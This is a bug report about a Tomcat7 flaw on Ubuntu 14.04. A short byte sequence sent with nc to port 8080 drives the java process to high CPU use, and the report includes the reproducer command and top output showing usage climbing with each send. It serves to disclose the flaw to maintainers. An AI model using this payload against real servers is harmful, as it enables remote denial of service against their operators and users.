Comment 0 for bug 1663318

I've been noticing during the last week that java process was using 100% CPU and after upgrading twice already the bug persisted. After keeping tcpdump in the background for about two days I managed to find the payload that triggers this bug.

To reproduce use the following command: printf "\0x05\0x02\0x00\0x02" | nc host_here 8080

The more times you send the payload, the more CPU will be used as can be seen on my quad core system below (please note this can be exploited remotely, I'm doing it from the server itself for clarity):

--------------------------------------

$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
$ sudo service tomcat7 restart
 * Stopping Tomcat servlet engine tomcat7 [ OK ]
 * Starting Tomcat servlet engine tomcat7 [ OK ]
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:04 GMT
Connection: close

0

top - 14:01:09 up 1:04, 1 user, load average: 1.86, 0.97, 0.48
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 5.9 us, 0.1 sy, 0.0 ni, 93.1 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 374644 used, 1671340 free, 23272 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 129088 18748 S 103.7 6.3 0:26.10 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:12 GMT
Connection: close

0

top - 14:01:17 up 1:05, 1 user, load average: 1.87, 0.99, 0.49
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 5.9 us, 0.1 sy, 0.0 ni, 93.0 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 374684 used, 1671300 free, 23280 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 129012 18748 S 195.5 6.3 0:39.13 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:19 GMT
Connection: close

0

top - 14:01:24 up 1:05, 1 user, load average: 1.97, 1.04, 0.51
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 6.1 us, 0.1 sy, 0.0 ni, 92.9 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 375928 used, 1670056 free, 23280 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 130104 18748 S 299.6 6.4 0:59.01 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
$ printf "\0x05\0x02\0x00\0x02" | nc -w 5 localhost 8080; top -bn 1 | head
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Transfer-Encoding: chunked
Date: Thu, 09 Feb 2017 17:01:26 GMT
Connection: close

0

top - 14:01:31 up 1:05, 1 user, load average: 2.13, 1.09, 0.53
Tasks: 129 total, 1 running, 128 sleeping, 0 stopped, 0 zombie
%Cpu(s): 6.2 us, 0.1 sy, 0.0 ni, 92.7 id, 0.9 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem: 2045984 total, 375992 used, 1669992 free, 23296 buffers
KiB Swap: 2097148 total, 0 used, 2097148 free. 147784 cached Mem

  PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
 1942 tomcat7 20 0 2110000 130364 18748 S 397.4 6.4 1:26.01 java
    1 root 20 0 33480 4008 2640 S 0.0 0.2 0:01.18 init
    2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd

--------------------------------------

Please let me know if I can assist you solving this problem. I'll probably upgrade to Ubuntu 16.04 LTS next week which hopefully it won't be vulnerable to this bug.

Thanks